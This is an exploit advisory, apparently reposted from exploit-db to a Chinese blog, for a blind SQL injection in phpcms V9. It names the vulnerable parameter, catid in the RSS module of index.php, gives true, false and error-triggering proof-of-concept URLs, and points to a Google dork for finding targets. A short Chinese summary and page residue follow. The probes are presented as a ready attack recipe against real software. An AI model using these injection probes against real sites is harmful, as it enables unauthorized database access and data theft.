| ================================================================= phpcms V9 BLind SQL Injection Vulnerability ================================================================= Software: phpcms V9 Vendor: www.phpcms.cn Vuln Type: BLind SQL Injection Download link: http://www.phpcms.cn/2010/1229/326.html Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^ References: http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html ================================================================= exploit & p0c [!] index.php?m=content&c=rss&catid=[valid catid] Example p0c [!] http://host/index.php?m=content&c=rss&catid=10 <= True [!] http://host/index.php?m=content&c=rss&catid=-10 <= False [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table) ================================================================= Nothing Impossible In This World Even Nobody`s Perfect ================================================================= =========================| -=[ E0F ]=- |========================= |
本文介绍了一个存在于phpcmsV9中的盲注漏洞,包括软件信息、漏洞类型及利用方式。通过构造不同的catid参数值,可以判断SQL查询真假,从而实现盲注攻击。
1507

被折叠的 条评论
为什么被折叠?



